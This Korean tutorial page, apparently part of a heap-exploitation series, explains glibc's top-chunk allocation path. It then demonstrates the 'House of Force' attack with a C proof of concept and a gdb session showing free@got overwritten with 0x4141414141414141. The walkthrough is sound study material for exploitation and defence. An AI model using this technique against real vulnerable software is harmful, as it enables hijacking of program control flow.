Excuse the ads! We need some help to keep our site up.
main_arene→top이 가지고 있는 값을 victim에 저장되고, top chunk의 크기를 size에 저장합니다.
malloc()은 "size"가 가지고 있는 값이 "새로 요청된 메모리의 크기(nb) + chunk의 최소 크기(MINSIZE)" 보다 크거나 같은 경우Top chunk의 공간을 사용합니다.
"size"에 저장된 값과 새로 요청된 메모리의 크기(nb)를 뺀 값을 "remainder_size"에 저장되고, victim에 저장된 값과 새로 요청된 메모리의 크기(nb)를 더한 값을 "remainder"에 저장합니다.
remainder는 main_arene→top에 저장합니다.
set_head()를 이용하여 새로 요청된 메모리의 크기(nb)를 victim→size에 저장되고, remainder_size가 가지고 있는 값을 remainder→size 에 저장합니다.
malloc()은 chunk2mem()가 호출되고 주소(p + 2*SIZE_SZ)를 반환합니다.
/* finally, do the allocation */ p = av->top; size = chunksize (p); /* check that one of the above allocation paths succeeded */ if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE)) { remainder_size = size - nb; remainder = chunk_at_offset (p, nb); av->top = remainder; set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0)); set_head (remainder, remainder_size | PREV_INUSE); check_malloced_chunk (av, p, nb); return chunk2mem (p); } |
#include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char *argv[]) { int size; unsigned long *buf1, *buf2, *buf3; fprintf(stderr,"The house of Force"); buf1 = malloc(256); buf1[33] = 0xffffffffffffffff; buf2 = malloc(0xffffffffffffeee0); buf3 = malloc(256); buf3[0] = 0x4141414141414141; free(buf3); return 0; } |
lazenca0x0@ubuntu:~$ gcc -o test test.c lazenca0x0@ubuntu:~$ gdb -q ./test Reading symbols from ./test...(no debugging symbols found)...done. gdb-peda$ disassemble main Dump of assembler code for function main: 0x00000000004005f6 <+0>: push rbp 0x00000000004005f7 <+1>: mov rbp,rsp 0x00000000004005fa <+4>: sub rsp,0x30 0x00000000004005fe <+8>: mov DWORD PTR [rbp-0x24],edi 0x0000000000400601 <+11>: mov QWORD PTR [rbp-0x30],rsi 0x0000000000400605 <+15>: mov rax,QWORD PTR [rip+0x200a54] # 0x601060 <stderr@@GLIBC_2.2.5> 0x000000000040060c <+22>: mov rcx,rax 0x000000000040060f <+25>: mov edx,0x12 0x0000000000400614 <+30>: mov esi,0x1 0x0000000000400619 <+35>: mov edi,0x400714 0x000000000040061e <+40>: call 0x4004e0 <fwrite@plt> 0x0000000000400623 <+45>: mov edi,0x100 0x0000000000400628 <+50>: call 0x4004d0 <malloc@plt> 0x000000000040062d <+55>: mov QWORD PTR [rbp-0x18],rax 0x0000000000400631 <+59>: mov rax,QWORD PTR [rbp-0x18] 0x0000000000400635 <+63>: add rax,0x108 0x000000000040063b <+69>: mov QWORD PTR [rax],0xffffffffffffffff 0x0000000000400642 <+76>: mov rdi,0xffffffffffffeee0 0x0000000000400649 <+83>: call 0x4004d0 <malloc@plt> 0x000000000040064e <+88>: mov QWORD PTR [rbp-0x10],rax 0x0000000000400652 <+92>: mov edi,0x100 0x0000000000400657 <+97>: call 0x4004d0 <malloc@plt> 0x000000000040065c <+102>: mov QWORD PTR [rbp-0x8],rax 0x0000000000400660 <+106>: mov rax,QWORD PTR [rbp-0x8] 0x0000000000400664 <+110>: add rax,0x8 0x0000000000400668 <+114>: movabs rdx,0x4141414141414141 0x0000000000400672 <+124>: mov QWORD PTR [rax],rdx 0x0000000000400675 <+127>: mov rax,QWORD PTR [rbp-0x8] 0x0000000000400679 <+131>: mov rdi,rax 0x000000000040067c <+134>: call 0x4004b0 <free@plt> 0x0000000000400681 <+139>: mov eax,0x0 0x0000000000400686 <+144>: leave 0x0000000000400687 <+145>: ret End of assembler dump. gdb-peda$ b *0x000000000040062d Breakpoint 1 at 0x40062d gdb-peda$ b *0x000000000040063b Breakpoint 2 at 0x40063b gdb-peda$ b *0x0000000000400649 Breakpoint 3 at 0x400649 gdb-peda$ b *0x0000000000400657 Breakpoint 4 at 0x400657 gdb-peda$ b *0x0000000000400672 Breakpoint 5 at 0x400672 gdb-peda$ b *0x000000000040067c Breakpoint 6 at 0x40067c gdb-peda$ |
gdb-peda$ r Starting program: /home/lazenca0x0/test The house of Force Breakpoint 1, 0x000000000040062d in main () gdb-peda$ i r rax rax 0x602010 0x602010 gdb-peda$ p main_arena.top $1 = (mchunkptr) 0x602110 gdb-peda$ p main_arena.top.size $2 = 0x20ef1 gdb-peda$ c Continuing. Breakpoint 2, 0x000000000040063b in main () gdb-peda$ x/i $rip => 0x40063b <main+69>: mov QWORD PTR [rax],0xffffffffffffffff gdb-peda$ i r rax rax 0x602118 0x602118 gdb-peda$ |
gdb-peda$ c Continuing. Breakpoint 3, 0x0000000000400649 in main () gdb-peda$ x/i $rip => 0x400649 <main+83>: call 0x4004d0 <malloc@plt> gdb-peda$ i r rdi rdi 0xffffffffffffeee0 0xffffffffffffeee0 gdb-peda$ ni 0x000000000040064e in main () gdb-peda$ i r rax rax 0x602120 0x602120 gdb-peda$ p main_arena.top $3 = (mchunkptr) 0x601000 gdb-peda$ c Continuing. Breakpoint 4, 0x0000000000400657 in main () gdb-peda$ x/i $rip => 0x400657 <main+97>: call 0x4004d0 <malloc@plt> gdb-peda$ i r rdi rdi 0x100 0x100 gdb-peda$ ni 0x000000000040065c in main () gdb-peda$ i r rax rax 0x601010 0x601010 gdb-peda$ |
0x40067c에서 free() 함수를 호출하면, 해당 함수는 free@plt(0x4004b0)를 호출합니다.
gdb-peda$ c Continuing. Breakpoint 5, 0x0000000000400672 in main () gdb-peda$ x/i $rip => 0x400672 <main+124>: mov QWORD PTR [rax],rdx gdb-peda$ i r rax rdx rax 0x601018 0x601018 rdx 0x4141414141414141 0x4141414141414141 gdb-peda$ x/gx 0x601018 0x601018: 0x00000000004004b6 gdb-peda$ x/gx 0x00000000004004b6 0x4004b6 <free@plt+6>: 0xffe0e90000000068 gdb-peda$ elfsymbol free Detail symbol info free@reloc = 0 free@plt = 0x4004b0 free@got = 0x601018 gdb-peda$ c Continuing. Breakpoint 6, 0x000000000040067c in main () gdb-peda$ x/i $rip => 0x40067c <main+134>: call 0x4004b0 <free@plt> gdb-peda$ gdb-peda$ x/2i 0x4004b0 0x4004b0 <free@plt>: jmp QWORD PTR [rip+0x200b62] # 0x601018 0x4004b6 <free@plt+6>: push 0x0 gdb-peda$ p/x 0x4004b6 + 0x200b62 $7 = 0x601018 gdb-peda$ x/gx 0x601018 0x601018: 0x4141414141414141 gdb-peda$ c Continuing. Program received signal SIGSEGV, Segmentation fault. Stopped reason: SIGSEGV 0x00000000004004b0 in free@plt () gdb-peda$ |